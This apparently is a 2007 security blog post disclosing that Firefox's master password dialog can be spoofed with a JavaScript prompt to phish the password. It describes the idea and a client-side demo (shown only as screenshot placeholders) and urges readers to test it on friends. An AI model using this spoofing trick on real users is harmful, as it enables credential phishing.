Firefox Master Password Dialog Weakness

6-10-2007

In client-side security history we've seen so many badly designed interfaces and technologies which lead to phising and several spoofing attacks (remember chrome window spoofing in IE?). Today I've noticed that Firefox Master Password Dialog is almost identical with Firefox JavaScript Prompt dialog. Potentially an attacker can show a Prompt dialog and capture the master password.

Obviously this is not a big deal since this password is useless without password file and if you got the password file you can just brute-force it anyway... And again obviously it's still important because it meant to be private and using same passwords among the services is still quite common.

Another problem related with the Master Password dialog you can't actually figure out which website is asking for password. Which cause a problem if you when you use three or more tabs. 

Anyway;

A simple demonstration (it's all client-side, even if you enter your real password it won't be transferred through the Internet, check out the source code)

CropperCapture[5] 
CropperCapture[4]

Also I'm quite curious that how many people would fall for this?.. Maybe a lot, maybe no one. Send to your friends whom you know using Firefox master password and observe. In my limited experience it actually worked, but for a successful exploitation best timing should be middle of surfing while five or more tabs opened.

Actual Differences between Master Password Dialog and JavaScript Prompt Dialog;

  1. Prompt dialog title is different,
  2. Master Password has a password field which masks your characters while you type, prompt dialog hasn't.

I repeat it again this is not a big deal but the important thing is user should know the source of dialogs. These dialogs and trusted UI elements shouldn't be spoofable and should be easily distinguishable. This is the same reason that we got better SSL indicators in latest browsers (btw : a funny example of SSL spoof).

Recent Blog Posts

See all of the blog posts